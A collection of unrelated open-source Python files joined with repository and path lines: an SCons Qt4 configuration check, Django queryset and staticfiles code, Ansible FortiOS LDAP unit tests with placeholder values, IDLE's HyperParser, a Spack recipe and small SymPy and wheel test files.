from subprocess import Popen, PIPE
from SCons.Script import *
from SCons.Builder import Builder
from SCons.Action import Action
moc4builder = Builder(
action = Action("$QT4_MOCCOM", "$QT4_MOCCOMSTR"),
prefix = "$QT4_MOCIMPLPREFIX",
suffix = "$QT4_MOCIMPLSUFFIX",
single_source = True
)
uic4builder = Builder(
action = Action("$QT4_UICCOM", "$QT4_UICCOMSTR"),
src_suffix="$QT4_UISUFFIX",
suffix="$QT4_UICDECLSUFFIX",
prefix="$QT4_UICDECLPREFIX",
single_source = True
)
qt4tools = {
"moc" : (moc4builder, """
class class_name : public QObject
{
Q_OBJECT
}
"""),
"uic" : (uic4builder, """
<ui version="4.0" >
<class>Form</class>
<widget class="QWidget" name="Form" >
<property name="geometry" >
<rect>
<x>0</x>
<y>0</y>
<width>400</width>
<height>300</height>
</rect>
</property>
<property name="windowTitle" >
<string>Form</string>
</property>
</widget>
<resources/>
<connections/>
</ui>
""")
}
qt4libs = {
"QtCore" : "QtGlobal",
"QtGui" : "QApplication",
"QtOpenGL" : "QGLWidget",
"Qt3Support" : "",
"QtSql" : "",
"QtNetwork" : "",
"QtSvg" : "",
"QtTest" : "",
"QtXml" : "",
"QtUiTools" : "",
"QtDesigner" : "",
"QtDBUS" : ""
}
def CheckQt4Tools(context, tools = ["moc", "uic"]):
context.Message("Checking for Qt 4 tools %s... " % ", ".join(tools))
env = context.env
env.SetDefault(
QT4_MOCCOM = "$QT4_MOC -o $TARGET $SOURCE",
QT4_MOCIMPLPREFIX = "moc_",
QT4_MOCIMPLSUFFIX = "$CXXFILESUFFIX",
QT4_UICCOM = "$QT4_UIC -o $TARGET $SOURCE",
QT4_UISUFFIX = ".ui",
QT4_UICDECLPREFIX = "ui_",
QT4_UICDECLSUFFIX = ".h"
)
results = []
for tool in tools:
if tool not in qt4tools:
raise KeyError("Unknown tool %s." % tool)
tool_var = "QT4_" + tool.upper()
if env.get("QT4DIR") and not env["use_frameworked_qt"]:
qt_bin_dir = join(env["QT4DIR"], "bin")
else:
qt_bin_dir = "/usr/bin"
if not env.has_key(tool_var):
env[tool_var] = WhereIs(tool + "-qt4", qt_bin_dir) or \
WhereIs(tool + "4", qt_bin_dir) or \
WhereIs(tool, qt_bin_dir)
if not env["use_frameworked_qt"]:
try:
tool_location = Popen(Split("pkg-config --variable=" + tool + "_location QtCore"), stdout = PIPE).communicate()[0]
tool_location = tool_location.rstrip("\n")
if exists(tool_location):
env[tool_var] = tool_location
except OSError:
pass
builder_method_name = tool.capitalize() + "4"
env.Append(BUILDERS = { builder_method_name : qt4tools[tool][0] } )
result = context.TryBuild(eval("env.%s" % builder_method_name), qt4tools[tool][1])
if not result or context.lastTarget.get_contents() == "":
context.Result("no")
return False
context.Result("yes")
return True
def CheckQt4Libs(context, libs = ["QtCore", "QtGui"]):
context.Message("Checking for Qt 4 libraries %s... " % ", ".join(libs))
env = context.env
backup = env.Clone().Dictionary()
if env["PLATFORM"] != "win32" and not env["use_frameworked_qt"]:
for lib in libs:
try:
env.ParseConfig("pkg-config --libs --cflags %s" % lib)
except OSError:
pass
if env["use_frameworked_qt"]:
env.Append(FRAMEWORKPATH = env.get("QT4DIR") or "/Library/Frameworks/")
env.Append(FRAMEWORKS = libs)
if env["PLATFORM"] == "win32":
if not env.has_key("QT4DIR"): raise KeyError("QT4DIR MUST be specified on Windows.")
env.AppendUnique(CPPPATH = [join("$QT4DIR", "include")])
for lib in libs:
if lib == "QtOpenGL":
env.AppendUnique(LIBS=["opengl32"])
env.AppendUnique(
CPPPATH = [join("$QT4DIR", "include", lib)],
LIBS = [lib + "4"],
LIBPATH = [join("$QT4DIR", "lib")]
)
test_program = ""
for lib in libs:
test_program += "#include <%s/%s>\n" % (lib, qt4libs[lib]) or lib
test_program += "int main() {}\n"
if context.TryLink(test_program, ".cpp"):
context.Result("yes")
return True
else:
context.Result("no")
env.Replace(**backup)
return False
def get_checks():
return { "CheckQt4Tools" : CheckQt4Tools, "CheckQt4Libs" : CheckQt4Libs }
|
BassantMorsi/finderApp
|
refs/heads/master
|
lib/python2.7/site-packages/wheel/test/simple.dist/setup.py
|
565
|
from setuptools import setup
try:
unicode
def u8(s):
return s.decode('unicode-escape').encode('utf-8')
except NameError:
def u8(s):
return s.encode('utf-8')
setup(name='simple.dist',
version='0.1',
description=u8('A testing distribution \N{SNOWMAN}'),
packages=['simpledist'],
extras_require={'voting': ['beaglevote']},
)
|
bplancher/odoo
|
refs/heads/9.0
|
addons/l10n_de_skr04/migrations/9.0.2.0/pre-set_tags_and_taxes_updatable.py
|
25
|
from openerp.modules.registry import RegistryManager
def migrate(cr, version):
registry = RegistryManager.get(cr.dbname)
from openerp.addons.account.models.chart_template import migrate_set_tags_and_taxes_updatable
migrate_set_tags_and_taxes_updatable(cr, registry, 'l10n_de_skr04')
|
sam-tsai/django-old
|
refs/heads/master
|
tests/regressiontests/queries/tests.py
|
10
|
import unittest
from django.db import DatabaseError, connections, DEFAULT_DB_ALIAS
from django.db.models import Count
from django.test import TestCase
from models import Tag, Annotation, DumbCategory, Note, ExtraInfo
class QuerysetOrderedTests(unittest.TestCase):
"""
Tests for the Queryset.ordered attribute.
"""
def test_no_default_or_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().ordered, False)
def test_cleared_default_ordering(self):
self.assertEqual(Tag.objects.all().ordered, True)
self.assertEqual(Tag.objects.all().order_by().ordered, False)
def test_explicit_ordering(self):
self.assertEqual(Annotation.objects.all().order_by('id').ordered, True)
def test_order_by_extra(self):
self.assertEqual(Annotation.objects.all().extra(order_by=['id']).ordered, True)
def test_annotated_ordering(self):
qs = Annotation.objects.annotate(num_notes=Count('notes'))
self.assertEqual(qs.ordered, False)
self.assertEqual(qs.order_by('num_notes').ordered, True)
class SubqueryTests(TestCase):
def setUp(self):
DumbCategory.objects.create(id=1)
DumbCategory.objects.create(id=2)
DumbCategory.objects.create(id=3)
def test_ordered_subselect(self):
"Subselects honor any manual ordering"
try:
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:2])
self.assertEquals(set(query.values_list('id', flat=True)), set([2,3]))
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[:2])
self.assertEquals(set(query.values_list('id', flat=True)), set([2,3]))
query = DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[2:])
self.assertEquals(set(query.values_list('id', flat=True)), set([1]))
except DatabaseError:
# Oracle and MySQL both have problems with sliced subselects.
# This prevents us from even evaluating this test case at all.
# Refs #10099
self.assertFalse(connections[DEFAULT_DB_ALIAS].features.allow_sliced_subqueries)
def test_sliced_delete(self):
"Delete queries can safely contain sliced subqueries"
try:
DumbCategory.objects.filter(id__in=DumbCategory.objects.order_by('-id')[0:1]).delete()
self.assertEquals(set(DumbCategory.objects.values_list('id', flat=True)), set([1,2]))
except DatabaseError:
# Oracle and MySQL both have problems with sliced subselects.
# This prevents us from even evaluating this test case at all.
# Refs #10099
self.assertFalse(connections[DEFAULT_DB_ALIAS].features.allow_sliced_subqueries)
class CloneTests(TestCase):
def test_evaluated_queryset_as_argument(self):
"#13227 -- If a queryset is already evaluated, it can still be used as a query arg"
n = Note(note='Test1', misc='misc')
n.save()
e = ExtraInfo(info='good', note=n)
e.save()
n_list = Note.objects.all()
# Evaluate the Note queryset, populating the query cache
list(n_list)
# Use the note queryset in a query, and evalute
# that query in a way that involves cloning.
try:
self.assertEquals(ExtraInfo.objects.filter(note__in=n_list)[0].info, 'good')
except:
self.fail('Query should be clonable')
|
adedayo/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/whileInIfUnwrap_after.py
|
80
|
if True:
# comment
x = 1<caret>
y = 2
|
da1z/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/staticfiles/storage.py
|
71
|
import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.storage import FileSystemStorage
from django.utils.importlib import import_module
from django.contrib.staticfiles import utils
class StaticFilesStorage(FileSystemStorage):
"""
Standard file system storage for site media files.
The defaults for ``location`` and ``base_url`` are
``STATIC_ROOT`` and ``STATIC_URL``.
"""
def __init__(self, location=None, base_url=None, *args, **kwargs):
if location is None:
location = settings.STATIC_ROOT
if base_url is None:
base_url = settings.STATIC_URL
if not location:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_ROOT setting. Set it to "
"the absolute path of the directory that holds static media.")
# check for None since we might use a root URL (``/``)
if base_url is None:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_URL setting. Set it to "
"URL that handles the files served from STATIC_ROOT.")
if settings.DEBUG:
utils.check_settings()
super(StaticFilesStorage, self).__init__(location, base_url, *args, **kwargs)
class AppStaticStorage(FileSystemStorage):
"""
A file system storage backend that takes an app module and works
for the ``static`` directory of it.
"""
source_dir = 'static'
def __init__(self, app, *args, **kwargs):
"""
Returns a static file storage if available in the given app.
"""
# app is actually the models module of the app. Remove the '.models'.
bits = app.__name__.split('.')[:-1]
self.app_name = bits[-1]
self.app_module = '.'.join(bits)
# The models module (app) may be a package in which case
# dirname(app.__file__) would be wrong. Import the actual app
# as opposed to the models module.
app = import_module(self.app_module)
location = self.get_location(os.path.dirname(app.__file__))
super(AppStaticStorage, self).__init__(location, *args, **kwargs)
def get_location(self, app_root):
"""
Given the app root, return the location of the static files of an app,
by default 'static'. We special case the admin app here since it has
its static files in 'media'.
"""
if self.app_module == 'django.contrib.admin':
return os.path.join(app_root, 'media')
return os.path.join(app_root, self.source_dir)
def get_prefix(self):
"""
Return the path name that should be prepended to files for this app.
"""
if self.app_module == 'django.contrib.admin':
return self.app_name
return None
def get_files(self, ignore_patterns=[]):
"""
Return a list containing the relative source paths for all files that
should be copied for an app.
"""
files = []
prefix = self.get_prefix()
for path in utils.get_files(self, ignore_patterns):
if prefix:
path = '/'.join([prefix, path])
files.append(path)
return files
|
hyperized/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_user_ldap.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_ldap
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_ldap.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_ldap_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_ldap_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_ldap_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'ldap', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_ldap_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'ldap', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_ldap_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_ldap_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_ldap': {
'random_attribute_not_valid': 'tag',
'account_key_filter': 'test_value_3',
'account_key_processing': 'same',
'ca_cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group_filter': 'test_value_8',
'group_member_check': 'user-attr',
'group_object_filter': 'test_value_10',
'group_search_base': 'test_value_11',
'member_attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password_expiry_warning': 'enable',
'password_renewal': 'enable',
'port': '17',
'secondary_server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server_identity_check': 'enable',
'source_ip': '84.230.14.22',
'ssl_min_proto_version': 'default',
'tertiary_server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_ldap.fortios_user(input_data, fos_instance)
expected_data = {
'account-key-filter': 'test_value_3',
'account-key-processing': 'same',
'ca-cert': 'test_value_5',
'cnid': 'test_value_6',
'dn': 'test_value_7',
'group-filter': 'test_value_8',
'group-member-check': 'user-attr',
'group-object-filter': 'test_value_10',
'group-search-base': 'test_value_11',
'member-attr': 'test_value_12',
'name': 'default_name_13',
'password': 'test_value_14',
'password-expiry-warning': 'enable',
'password-renewal': 'enable',
'port': '17',
'secondary-server': 'test_value_18',
'secure': 'disable',
'server': '192.168.100.20',
'server-identity-check': 'enable',
'source-ip': '84.230.14.22',
'ssl-min-proto-version': 'default',
'tertiary-server': 'test_value_24',
'type': 'simple',
'username': 'test_value_26'
}
set_method_mock.assert_called_with('user', 'ldap', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
CamelBackNotation/CarnotKE
|
refs/heads/master
|
jyhton/lib-python/2.7/idlelib/HyperParser.py
|
64
|
"""
HyperParser
===========
This module defines the HyperParser class, which provides advanced parsing
abilities for the ParenMatch and other extensions.
The HyperParser uses PyParser. PyParser is intended mostly to give information
on the proper indentation of code. HyperParser gives some information on the
structure of code, used by extensions to help the user.
"""
import string
import keyword
from idlelib import PyParse
class HyperParser:
def __init__(self, editwin, index):
"""Initialize the HyperParser to analyze the surroundings of the given
index.
"""
self.editwin = editwin
self.text = text = editwin.text
parser = PyParse.Parser(editwin.indentwidth, editwin.tabwidth)
def index2line(index):
return int(float(index))
lno = index2line(text.index(index))
if not editwin.context_use_ps1:
for context in editwin.num_context_lines:
startat = max(lno - context, 1)
startatindex = repr(startat) + ".0"
stopatindex = "%d.end" % lno
# We add the newline because PyParse requires a newline at end.
# We add a space so that index won't be at end of line, so that
# its status will be the same as the char before it, if should.
parser.set_str(text.get(startatindex, stopatindex)+' \n')
bod = parser.find_good_parse_start(
editwin._build_char_in_string_func(startatindex))
if bod is not None or startat == 1:
break
parser.set_lo(bod or 0)
else:
r = text.tag_prevrange("console", index)
if r:
startatindex = r[1]
else:
startatindex = "1.0"
stopatindex = "%d.end" % lno
# We add the newline because PyParse requires a newline at end.
# We add a space so that index won't be at end of line, so that
# its status will be the same as the char before it, if should.
parser.set_str(text.get(startatindex, stopatindex)+' \n')
parser.set_lo(0)
# We want what the parser has, except for the last newline and space.
self.rawtext = parser.str[:-2]
# As far as I can see, parser.str preserves the statement we are in,
# so that stopatindex can be used to synchronize the string with the
# text box indices.
self.stopatindex = stopatindex
self.bracketing = parser.get_last_stmt_bracketing()
# find which pairs of bracketing are openers. These always correspond
# to a character of rawtext.
self.isopener = [i>0 and self.bracketing[i][1] > self.bracketing[i-1][1]
for i in range(len(self.bracketing))]
self.set_index(index)
def set_index(self, index):
"""Set the index to which the functions relate. Note that it must be
in the same statement.
"""
indexinrawtext = \
len(self.rawtext) - len(self.text.get(index, self.stopatindex))
if indexinrawtext < 0:
raise ValueError("The index given is before the analyzed statement")
self.indexinrawtext = indexinrawtext
# find the rightmost bracket to which index belongs
self.indexbracket = 0
while self.indexbracket < len(self.bracketing)-1 and \
self.bracketing[self.indexbracket+1][0] < self.indexinrawtext:
self.indexbracket += 1
if self.indexbracket < len(self.bracketing)-1 and \
self.bracketing[self.indexbracket+1][0] == self.indexinrawtext and \
not self.isopener[self.indexbracket+1]:
self.indexbracket += 1
def is_in_string(self):
"""Is the index given to the HyperParser is in a string?"""
# The bracket to which we belong should be an opener.
# If it's an opener, it has to have a character.
return self.isopener[self.indexbracket] and \
self.rawtext[self.bracketing[self.indexbracket][0]] in ('"', "'")
def is_in_code(self):
"""Is the index given to the HyperParser is in a normal code?"""
return not self.isopener[self.indexbracket] or \
self.rawtext[self.bracketing[self.indexbracket][0]] not in \
('#', '"', "'")
def get_surrounding_brackets(self, openers='([{', mustclose=False):
"""If the index given to the HyperParser is surrounded by a bracket
defined in openers (or at least has one before it), return the
indices of the opening bracket and the closing bracket (or the
end of line, whichever comes first).
If it is not surrounded by brackets, or the end of line comes before
the closing bracket and mustclose is True, returns None.
"""
bracketinglevel = self.bracketing[self.indexbracket][1]
before = self.indexbracket
while not self.isopener[before] or \
self.rawtext[self.bracketing[before][0]] not in openers or \
self.bracketing[before][1] > bracketinglevel:
before -= 1
if before < 0:
return None
bracketinglevel = min(bracketinglevel, self.bracketing[before][1])
after = self.indexbracket + 1
while after < len(self.bracketing) and \
self.bracketing[after][1] >= bracketinglevel:
after += 1
beforeindex = self.text.index("%s-%dc" %
(self.stopatindex, len(self.rawtext)-self.bracketing[before][0]))
if after >= len(self.bracketing) or \
self.bracketing[after][0] > len(self.rawtext):
if mustclose:
return None
afterindex = self.stopatindex
else:
# We are after a real char, so it is a ')' and we give the index
# before it.
afterindex = self.text.index("%s-%dc" %
(self.stopatindex,
len(self.rawtext)-(self.bracketing[after][0]-1)))
return beforeindex, afterindex
# This string includes all chars that may be in a white space
_whitespace_chars = " \t\n\\"
# This string includes all chars that may be in an identifier
_id_chars = string.ascii_letters + string.digits + "_"
# This string includes all chars that may be the first char of an identifier
_id_first_chars = string.ascii_letters + "_"
# Given a string and pos, return the number of chars in the identifier
# which ends at pos, or 0 if there is no such one. Saved words are not
# identifiers.
def _eat_identifier(self, str, limit, pos):
i = pos
while i > limit and str[i-1] in self._id_chars:
i -= 1
if i < pos and (str[i] not in self._id_first_chars or \
keyword.iskeyword(str[i:pos])):
i = pos
return pos - i
def get_expression(self):
"""Return a string with the Python expression which ends at the given
index, which is empty if there is no real one.
"""
if not self.is_in_code():
raise ValueError("get_expression should only be called if index "\
"is inside a code.")
rawtext = self.rawtext
bracketing = self.bracketing
brck_index = self.indexbracket
brck_limit = bracketing[brck_index][0]
pos = self.indexinrawtext
last_identifier_pos = pos
postdot_phase = True
while 1:
# Eat whitespaces, comments, and if postdot_phase is False - one dot
while 1:
if pos>brck_limit and rawtext[pos-1] in self._whitespace_chars:
# Eat a whitespace
pos -= 1
elif not postdot_phase and \
pos > brck_limit and rawtext[pos-1] == '.':
# Eat a dot
pos -= 1
postdot_phase = True
# The next line will fail if we are *inside* a comment, but we
# shouldn't be.
elif pos == brck_limit and brck_index > 0 and \
rawtext[bracketing[brck_index-1][0]] == '#':
# Eat a comment
brck_index -= 2
brck_limit = bracketing[brck_index][0]
pos = bracketing[brck_index+1][0]
else:
# If we didn't eat anything, quit.
break
if not postdot_phase:
# We didn't find a dot, so the expression end at the last
# identifier pos.
break
ret = self._eat_identifier(rawtext, brck_limit, pos)
if ret:
# There is an identifier to eat
pos = pos - ret
last_identifier_pos = pos
# Now, in order to continue the search, we must find a dot.
postdot_phase = False
# (the loop continues now)
elif pos == brck_limit:
# We are at a bracketing limit. If it is a closing bracket,
# eat the bracket, otherwise, stop the search.
level = bracketing[brck_index][1]
while brck_index > 0 and bracketing[brck_index-1][1] > level:
brck_index -= 1
if bracketing[brck_index][0] == brck_limit:
# We were not at the end of a closing bracket
break
pos = bracketing[brck_index][0]
brck_index -= 1
brck_limit = bracketing[brck_index][0]
last_identifier_pos = pos
if rawtext[pos] in "([":
# [] and () may be used after an identifier, so we
# continue. postdot_phase is True, so we don't allow a dot.
pass
else:
# We can't continue after other types of brackets
if rawtext[pos] in "'\"":
# Scan a string prefix
while pos > 0 and rawtext[pos - 1] in "rRbBuU":
pos -= 1
last_identifier_pos = pos
break
else:
# We've found an operator or something.
break
return rawtext[last_identifier_pos:self.indexinrawtext]
|
rspavel/spack
|
refs/heads/develop
|
var/spack/repos/builtin/packages/py-pycifrw/package.py
|
5
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPycifrw(PythonPackage):
"""Python library for interacting with Crystallographic Information
Framework (CIF) files."""
homepage = "https://bitbucket.org/jamesrhester/pycifrw/src/development/"
url = "https://pypi.io/packages/source/P/PyCifRW/PyCifRW-4.4.1.tar.gz"
version('4.4.1', sha256='cef7662f475e0eb78a55c2d55774d474e888c96b0539e5f08550afa902cdc4e1')
depends_on('py-setuptools', type='build')
|
elkingtonmcb/sympy
|
refs/heads/master
|
sympy/polys/tests/test_rationaltools.py
|
124
|
"""Tests for tools for manipulation of rational expressions. """
from sympy.polys.rationaltools import together
from sympy import S, symbols, Rational, sin, exp, Eq, Integral, Mul
from sympy.abc import x, y, z
A, B = symbols('A,B', commutative=False)
def test_together():
assert together(0) == 0
assert together(1) == 1
assert together(x*y*z) == x*y*z
assert together(x + y) == x + y
assert together(1/x) == 1/x
assert together(1/x + 1) == (x + 1)/x
assert together(1/x + 3) == (3*x + 1)/x
assert together(1/x + x) == (x**2 + 1)/x
assert together(1/x + Rational(1, 2)) == (x + 2)/(2*x)
assert together(Rational(1, 2) + x/2) == Mul(S.Half, x + 1, evaluate=False)
assert together(1/x + 2/y) == (2*x + y)/(y*x)
